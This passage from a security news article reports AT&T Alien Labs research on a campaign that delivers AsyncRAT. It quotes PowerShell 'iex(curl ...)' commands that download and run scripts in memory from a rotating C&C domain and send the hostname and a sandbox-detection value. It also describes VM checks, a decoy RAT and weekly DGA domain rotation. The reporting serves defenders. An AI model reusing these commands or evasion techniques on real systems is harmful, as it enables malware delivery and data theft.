The payload is another encoded script written in PowerShell that is executed directly in memory without being saved to disk with a “conhost –headless powershell iex(curl -useb sduyvzep[.]top/1.php?hash=)” command. The domain of the C&C server is rotated periodically.
The PowerShell script executes yet another PowerShell script by invoking the iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”) command. This sends some information to the C&C server such as the computer hostname and a variable called $wiqnfex that indicates the likelihood of the computer being a virtual machine or sandbox. This value is set after the first performs a few checks for the system’s graphics card adapter and BIOS, which would be emulated in a VM.
If the C&C server determines the $wiqnfex indicates a valid target, the server deploys AsyncRAT. If the variable value indicates a possible VM or sandbox, it redirects the request to Google or to a different PowerShell script that downloads and launches a decoy RAT.
“When decompiled, the RAT is actually a distraction for any researchers looking into the campaign,” the Alien Lab researchers said. “The sample is a decoy made to resemble a RAT for several reasons. The assembly name is DecoyClient, and the configuration isn’t encrypted as it would be in an AsyncRAT sample. Additionally, the sample does not contain a C&C server, only loopback addresses. Furthermore, among the data to be exfiltrated to the C&C, is the string ‘LOL’ or the group ‘GOVNO’.”
A new command-and-control domain every week
In addition to regularly randomizing the script code and malware samples to evade detection, the attackers also rotate the C&C domains every week. However, the Alien Lab researchers managed to reverse-engineer the domain generation algorithm, which together with several other constants such as the TLD (.top), registrar, and organization name used to register the domains, and were able to find the domains used in the past and obtain past samples of the deployment scripts.
“These domains have been observed to carry the same features as mentioned before, with the difference of being 15 characters long,” the researchers said. “This allows us to pivot and find historical samples based off the DGA, as well as build detections to identify future infrastructure despite all their efforts to evade EDR and static detections.” The AT&T Alien Labs report includes detection signatures for this campaign that can be used with the open-source Suricata intrusion detection system as well as a list of indicators of compromise (IOC) that can be used to build detections for other systems.